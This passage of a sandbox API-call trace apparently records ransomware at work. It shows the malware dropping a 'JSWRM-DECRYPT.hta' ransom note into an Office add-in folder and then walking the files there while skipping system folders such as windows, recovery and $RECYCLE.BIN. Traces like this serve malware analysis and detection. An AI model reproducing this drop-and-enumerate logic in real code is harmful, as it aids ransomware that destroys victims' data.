(HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0125.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x2501e8 [0125.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0125.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x251fb8 [0125.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0125.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0125.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0125.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0125.667] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\vi\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\vi\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0125.668] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.668] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0125.669] CloseHandle (hObject=0x314) returned 1 [0125.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0125.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x251fb8 | out: hHeap=0x1e0000) returned 1 [0125.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0125.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0125.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0125.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0125.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0125.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0125.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0125.671] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\vi\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\vi\\jswrm-decrypt.hta")) returned 0x20 [0125.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0125.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0125.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0125.671] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\vi\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf637b042, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x161d962a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x418fcb47, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x232180 [0125.671] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0125.671] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf637b042, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x161d962a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x418fcb47, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0125.671] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0125.672] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0125.672] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc40a725, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc40a725, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x161d962a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc4858, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0125.672] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0125.672] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0125.672] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0125.672] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0125.672] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0125.672] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0125.672] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0125.672] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.672] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0125.672] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0125.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0125.672] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0125.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0125.672] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241268, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0125.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0125.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0125.672] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0125.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0125.672] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241308, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0125.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0125.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b2b0 [0125.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0125.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0125.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0125.672] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x418fcb47, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x418fcb47, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x418fcb47, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0125.672] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0125.672] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0125.672] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0125.672] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0125.672] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0125.672] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0125.673] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0125.673] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0125.673] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0125.673] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0125.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0125.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0125.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0125.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0125.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0125.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b2b0 | out: hHeap=0x1e0000) returned 1 [0125.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0125.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0125.673] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa5581c0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa5581c0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa68949f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x15058, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0125.673] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0125.673] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0125.673] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0125.673] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0125.673] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0125.673] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0125.673] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0125.673] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.673] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0125.673] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0125.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0125.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0125.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0125.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0125.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0125.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0125.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0125.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0125.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.674] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf637b042, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf637b042, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf637b042, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x12ad8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0125.674] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0125.674] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0125.674] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0125.674] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0125.674] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0125.674] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0125.674] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0125.674] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.674] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0125.674] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0125.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0125.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0125.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0125.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0125.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d578, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0125.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f158 [0125.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0125.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0125.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0125.675] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa4733b6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa4733b6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa531f86, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5440, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0125.675] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0125.675] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0125.675] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0125.675] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0125.675] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0125.675] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0125.675] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0125.675] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.675] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0125.675] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0125.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0125.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0125.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0125.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0125.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d578, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0125.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ede0 [0125.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0125.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0125.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.675] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x161d962a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x161d962a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16605845, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f7f1, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.vi.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0125.675] lstrcmpiW (lpString1="PowerViewRes.vi.xap", lpString2=".") returned 1 [0125.675] lstrcmpiW (lpString1="PowerViewRes.vi.xap", lpString2="..") returned 1 [0125.675] lstrcmpiW (lpString1="PowerViewRes.vi.xap", lpString2="...") returned 1 [0125.675] lstrcmpiW (lpString1="PowerViewRes.vi.xap", lpString2="windows") returned -1 [0125.675] lstrcmpiW (lpString1="PowerViewRes.vi.xap", lpString2="recovery") returned -1 [0125.675] lstrcmpiW (lpString1="PowerViewRes.vi.xap", lpString2="perflogs") returned 1 [0125.676] lstrcmpiW (lpString1="PowerViewRes.vi.xap", lpString2="documents and settings") returned 1 [0125.676] lstrcmpiW (lpString1="PowerViewRes.vi.xap", lpString2="$RECYCLE.BIN") returned 1 [0125.676] lstrcmpiW (lpString1="PowerViewRes.vi.xap", lpString2="system volume information") returned -1 [0125.676] lstrcmpiW (lpString1="PowerViewRes.vi.xap", lpString2="msocache") returned 1 [0125.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0125.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.vi.xap", cchWideChar=19, 